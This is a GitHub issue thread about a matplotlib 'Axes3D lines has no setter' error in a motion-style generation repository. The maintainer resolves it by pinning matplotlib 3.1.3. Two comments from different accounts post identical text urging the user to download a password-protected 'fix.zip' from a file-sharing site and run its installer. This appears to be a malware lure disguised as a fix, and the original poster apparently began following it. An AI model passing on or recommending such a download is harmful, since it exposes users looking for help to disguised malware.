### ISSUE TITLE
Error in visualization 

### ISSUE THREAD

**Issue by meongeun** [Murrol/GenMoStyle-code#3]
I having error with this line while running the command. 
python generate_cmu_l.py --name LVAE_AE_RCE1_KGLE1_121_YL_ML160 --gpu_id 0 --dataset_name bfa --motion_length 160 --ext cmu_SP_IK --use_style --batch_size 12 --use_ik --niters 1 --sampling

utils/plot_scripts.py 
    def update(index):
        ax.lines = []
        ax.collections = []
        
    ax.lines = []
    ^^^^^^^^
AttributeError: property 'lines' of 'Axes3D' object has no setter

I change your codes to this. but the saved mp4 video showed blank figures. Do you know how to solve it?  
try1) ax.clear()
try2) while ax.lines:
            ax.lines[0].remove()
        while ax.collections:
            ax.collections[0].remove()

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by meongeun** [comment]
I can find gcc in the installer menu. Is this right? 

![fix](https://github.com/user-attachments/assets/5114a668-afcc-4487-8f38-c83b5221dcde)

**Comment by Murrol** [comment]
Hi,
matplotlib==3.1.3 should work.

**Comment by meongeun** [comment]
> Hi, matplotlib==3.1.3 should work.

Thank you it works.
